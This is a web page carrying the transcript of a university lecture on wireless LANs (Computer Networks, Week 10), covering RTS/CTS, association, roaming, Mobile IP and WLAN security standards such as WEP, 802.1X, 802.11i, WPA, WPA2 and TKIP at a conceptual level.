1 / 27

Computer Networks

Computer Networks. Marwan Al- Namari Week 10. RTS/CTS time line. RTS: Ready-to-Send. CTS: Clear-to- Send. ACK: Acknowledgment .NAV: network allocation vector (channel access, expected time to finish and packet sequence transmission ). Association.

gzifa
Télécharger la présentation

Computer Networks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Computer Networks Marwan Al-Namari Week 10

  2. RTS/CTS time line RTS: Ready-to-Send. CTS: Clear-to- Send. ACK: Acknowledgment .NAV: network allocation vector (channel access, expected time to finish and packet sequence transmission )

  3. Association The process of connecting a node to an access point is called ‘Association’ This occurs when a node moves within range and tunes its radio channel to what the access point is set to.

  4. Inter-cell communications Inter-cell communication of nodes connected to different access points by a distribution system or backbone network is accommodated by a frame structure which contain four MAC addresses

  5. Access Points and Roaming The use of Access Points can result in essentially unlimited range Access Points are typically installed in a false ceiling (higher = better) APs are connected to the Ethernet backbone and act as a bridge between Ethernet and wireless All communications are through the AP

  6. Roaming

  7. Basic Roaming As the mobile user roams away from one AP and closer to another, his WLAN NIC will automatically “re-associate” with the closer AP to maintain reliable performance.

  8. Broad Roaming Employing Channel Reuse Access Points can be programmed to 3 different channels and these can be re-used to provide potentially unlimited coverage.

  9. Load Balancing Even if a user is stationary, his WLAN NIC may decide to “re-associate” with a different AP because the load on the current AP is too high for optimal performance

  10. Mobile IP roaming

  11. Seamless Extended Roaming As the mobile user roams across a router boundary, the WLAN NIC will inform the AP on the other side of the router of his “Home Agent” AP and a “forwarding” relationship will be set up between the two APs

  12. Security Issues WEP Wired Equivalent Privacy (can be easily cracked) IEEE 802.1x authentication Access Control Lists (they can be spoofed) Turn off SSID broadcast (they can be sniffed) WPA (Wired or Wi-Fi protected access) better than WEP available in latest 802.11g technology IEEE 802.11i standard solution ratified 2004 uses stronger encryption and authentication techniques Additional security options: VPNVirtual Private Network (AP could be end point) VLAN Virtual LAN WLAN switches

  13. WEP problem Among WEP's numerous flaws are its lack of a message integrity code and its insecure data-confidentiality protocol. Since the decryption could be done passively, it meant that an attacker could watch WEP traffic from a distance, be undetected, and know the original traffic.

  14. IEEE 802.11i IEEE 802.11i, "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: Medium Access Control (MAC) Security Enhancement," leverages security technology that has emerged since the original IEEE 802.11 standard was written in the late 1990s. These developments include the Advanced Encryption Standard (AES) and the IEEE 802.1X™ standard for access control. All in all, the IEEE 802.11i amendment is a step forward in wireless security. The amendment adds stronger encryption, authentication, and key management strategies that will make our wireless data and systems more secure.

  15. IEEE 802.11i

  16. More IEEE802.11i For IEEE 802.11i, the access point takes the role of the authenticator and the client card the role of supplicant. (In systems using Independent Basic Service Set [IBSS], the client card takes the role of supplicant and authenticator.) The supplicant authenticates with the authentication server through the authenticator. In IEEE 802.1X, the authenticator enforces authentication. The authenticator doesn't need to do the authentication. Instead the authenticator exchanges the authentication traffic between the supplicant and the authentication server. Between the supplicant and the authenticator, the protocol is IEEE 802.1X. The protocol between the authenticator and authentication server isn't defined in IEEE 802.1X nor IEEE 802.11i. However, Radius is typically used between authenticator and authentication server.

  17. WPA (WPA) Wireless Protected Access :is a standards-based security solution from the Wi-Fi Alliance that addresses the vulnerabilities in native WLANs and provides enhanced protection from targeted attacks. WPA addresses all known Wired Equivalent Privacy (WEP) vulnerabilities in the original IEEE 802.11 security implementation and brings an immediate security solution to WLANs in both enterprise and small office/home office (SOHO) environments. WPA uses Temporal Key Integrity Protocol (TKIP) for encryption.

  18. WPA2 Provides authentication support via IEEE 802.1X and PSK( pre shared keys) Enterprise Mode: Enterprise Mode is a term given to products that are tested to be interoperable in both PSK and IEEE 802.1X/EAP modes of operation for authentication. When IEEE 802.1X is used, an authentication, authorization, and accounting (AAA) server (the RADIUS protocol for authentication and key management and centralized management of user credentials) is required. Enterprise Mode is targeted to enterprise environments. Personal Mode: Personal Mode is a term given to products tested to be interoperable in the PSK-only mode of operation for authentication. It requires manual configuration of a pre-shared key on the access point and clients. PSK authenticates users via a password, or identifying code, on both the client station and the access point. No authentication server is needed. Personal Mode is targeted to SOHO environments.

  19. TKIP The Temporal Key Integrity Protocol (TKIP) is a data-confidentiality protocol that was designed to improve the security of products that implemented WEP To get around WEP limitations, TKIP uses a message integrity code called Michael. Basically, Michael enables devices to authenticate that the packets are coming from the claimed source. This authentication is especially important in a wireless technology where traffic can be easily injected. TKIP uses a mixing function to defeat weak-key attacks, which enabled attackers to decrypt traffic. TKIP fixes this situation by using a mixing function.

  20. WEP and 802.1x As an authentication standard for wired networks, 802.1X has a happy side effect when used with WLANs: It gives you per-user, per-session WEP keys. While WEP's many other theoretical problems still exist, 802.1X solves the biggest practical issue. No longer does everyone use the same WEP key that can stick around for months or even years. Instead, every connection authenticated with 802.1X gets its own WEP key that can be changed as often as the network professional controlling the WLAN desires.

  21. IEEE 802.1x use in IEEE 802.11i IEEE 802.1X provides a framework to authenticate and authorize devices connecting to a network. It prohibits access to the network until such devices pass authentication. It also provides a framework to transmit key information between authenticator and supplicant.

  22. IEEE 802.1x framework

  23. Wireless Switches Used for management and security control Different policies can be assigned for each wired segment Some WLAN switches have built in APs and authentication servers

  24. WLAN SWITCH

  25. WLAN switch2 Before After Can have different policies for each wired segment

  26. abg Segmentation Could segment by configuring access point so that some users to use b or g and others to use a standard Or Use multiple access points connected to a WLAN switch – can also restrict access using security features – must ensure channels don't interfere

  27. Extended WLAN Public access (hot spots) Wireless Bridging 3G mobile Mesh Radio Broadband Wireless IEEE 802.16 Wi-MAX

More Related